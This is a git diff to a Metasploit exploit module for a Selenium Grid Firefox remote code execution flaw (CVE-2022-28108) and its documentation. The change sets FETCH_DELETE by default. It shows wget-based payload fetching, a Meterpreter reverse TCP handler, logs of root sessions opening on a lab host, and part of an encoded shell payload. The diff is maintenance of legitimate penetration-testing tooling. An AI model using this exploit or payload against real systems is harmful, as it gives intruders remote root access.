diff --git a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md index 7b47aaeeba..8a0f67975e 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md @@ -55,8 +55,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) - FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME vryeXadl no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_DELETE true yes Attempt to delete the binary after execution + FETCH_FILENAME STduFkVLXVH no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload @@ -79,8 +79,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable -[+] Deleted /GsDqXNZBxmLv -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:44250) at 2024-12-29 11:53:58 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58392) at 2024-12-29 12:27:12 +0900 meterpreter > getuid Server username: root @@ -99,8 +98,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation. -[+] Deleted /poYThRAaVWqQ -[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59596) at 2024-12-29 11:56:25 +0900 +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59150) at 2024-12-29 12:31:50 +0900 meterpreter > getuid Server username: root diff --git a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb index b3826eb071..3c7dd7036d 100644 --- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb @@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) @@ -45,6 +44,9 @@ class MetasploitModule < Msf::Exploit::Remote } ], ], + 'DefaultOptions' => { + 'FETCH_DELETE' => true + }, 'DefaultTarget' => 0, 'DisclosureDate' => '2022-04-18', 'Notes' => { @@ -124,8 +126,6 @@ class MetasploitModule < Msf::Exploit::Remote session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId'] fail_with(Failure::Unreachable, 'Failed to start session') unless session_id - register_files_for_cleanup("/#{datastore['FETCH_FILENAME']}") - b64encoded_payload = Rex::Text.encode_base64( "rm -rf $0\n"\ "if sudo -n true 2>/dev/null; then\n"\